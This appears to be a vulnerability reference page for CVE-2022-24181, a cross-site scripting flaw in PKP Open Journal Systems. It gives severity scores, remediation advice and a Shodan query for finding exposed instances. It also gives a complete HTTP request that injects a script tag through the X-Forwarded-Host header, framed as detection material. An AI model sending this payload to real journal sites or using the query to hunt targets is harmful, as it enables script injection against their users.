🔙 목록으로 돌아가기

CVE-2022-24181: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting

TitlePKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting
Authorlucasljm2001,ekrause
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
RemediationUpgrade to a patched version of PKP Open Journal Systems (OJS) or apply the necessary security patches provided by the vendor.
CVSS Score6.1
EPSS Score0.04272
CVE IDCVE-2022-24181
CWE IDCWE-79
Shodan Querycpe:"cpe:2.3:a:public_knowledge_project:open_journal_systems"
Tags cve cve2022 xss oss pkp-lib edb public_knowledge_project vuln

🔍 Vulnerability Description

PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.

🌐 HTTP Request

GET /iupjournals/index.php/esj HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Connection: close
X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-24181.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-24181.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A